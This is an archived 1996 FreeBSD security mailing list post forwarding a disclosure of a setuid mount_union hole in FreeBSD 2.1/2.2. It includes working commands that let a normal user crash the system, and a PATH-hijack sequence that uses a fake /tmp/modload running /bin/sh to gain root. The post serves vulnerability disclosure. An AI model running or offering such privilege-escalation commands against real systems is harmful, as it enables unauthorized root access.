From owner-freebsd-security Fri May 17 00:47:41 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id AAA24651 for security-outgoing; Fri, 17 May 1996 00:47:41 -0700 (PDT) Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id AAA24645 for ; Fri, 17 May 1996 00:47:38 -0700 (PDT) Received: from onyx.nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.5/8.7.3) with SMTP id AAA21251 for ; Fri, 17 May 1996 00:47:35 -0700 (PDT) Date: Fri, 17 May 1996 00:47:31 -0700 (PDT) From: invalid opcode To: freebsd-security@freebsd.org Subject: BoS: SECURITY BUG in FreeBSD (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk hmmmmm == Chris Layne ======================================== Nervosa Computing == == coredump@nervosa.com ================ http://www.nervosa.com/~coredump == ---------- Forwarded message ---------- Date: Fri, 17 May 1996 09:12:13 METDST From: Krzysztof Labanowski To: best-of-security@suburbia.net Subject: BoS: SECURITY BUG in FreeBSD Hi! FreeBSD has a security hole... dangerous is mount_union if suid is set vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT probably FreeBSD 2.1 STABLE is not vulnerable to crash system (as a normal user) try this: mkdir a mkdir b mount_union ~/a ~/b mount_union -b ~/a ~/b to got euid try this: export PATH=/tmp:$PATH #if zsh, of course echo /bin/sh >/tmp/modload chmod +x /tmp/modload mount_union /dir1 /dir2 and You are root! Hole found by Adam Kubicki Best wishes Chris Labanowski KL